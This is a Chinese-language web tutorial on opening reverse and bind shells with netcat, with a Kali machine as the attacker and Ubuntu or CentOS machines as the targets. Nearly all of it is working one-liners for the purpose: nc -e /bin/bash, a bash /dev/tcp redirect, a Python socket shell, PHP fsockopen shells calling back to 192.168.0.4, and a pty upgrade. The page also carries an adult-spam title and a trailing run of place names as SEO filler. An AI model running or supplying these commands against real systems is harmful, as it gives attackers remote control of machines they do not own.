中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

NC如何反彈shell

發布時間:2021-05-14 09:40:18 來源:億速云 閱讀:239 作者:小新 欄目:開發技術

這篇文章給大家分享的是有關NC如何反彈shell的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

假如ubuntu、CentOS為目標服務器系統

kali為攻擊者的系統,ip為:192.168.0.4,開放7777端口且沒被占用

最終是將ubuntu、CentOS的shell反彈到kali上

正向反彈shell

ubuntu或者CentOS上面輸入

nc -lvp 7777 -e /bin/bash

kali上輸入

nc ip 7777

正向反彈是目標機先執行nc命令,然后kali上再進行nc監聽,即可反彈shell。

需要目標機安裝nc。

反向反彈shell

方法1:bash反彈

bash -i >& /dev/tcp/ip/port 0>&1

但首先需要在kali上使用nc監聽端口:

nc -lvp 7777

此方法在ubuntu下不會反彈成功,CentOS可以反彈成功。

方法2:python反彈

反彈shell的命令如下:

代碼如下:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

首先,使用nc在kali上監聽端口:

nc -lvp 7777

在CentOS或者ubuntu下使用python去反向連接,輸入:

代碼如下:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

此方法ubuntu和Linux均反彈成功。

方法3

首先在kali上輸入nc監聽:

nc -lvp 7777

在CentOS或者ubuntu 上使用nc去反向連接,命令如下:

nc -e /bin/bash 192.168.0.4 7777

方法4:php反彈shell

首先在kali上輸入:

nc -lvp 7777

然后在目標機上輸入:

php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'


php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

注意php反彈shell的這些方法都需要php關閉safe_mode這個選項,才可以使用exec函數。

 遇到反彈后不是正常的shell,可用命令:

python -c 'import pty;pty.spawn("/bin/bash")'

轉化為常規的shell。

感謝各位的閱讀!關于“NC如何反彈shell”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

莱州市| 临猗县| 郧西县| 金湖县| 南召县| 连城县| 铁岭市| 泽普县| 老河口市| 玉环县| 抚宁县| 麻城市| 太原市| 佛山市| 拉萨市| 多伦县| 南平市| 龙州县| 旬邑县| 子长县| 定州市| 元朗区| 固阳县| 兴和县| 泰州市| 微博| 琼中| 聂拉木县| 乌什县| 都匀市| 海阳市| 桦甸市| 民乐县| 宜昌市| 花莲市| 渝北区| 黑河市| 德昌县| 长岭县| 大渡口区| 应用必备|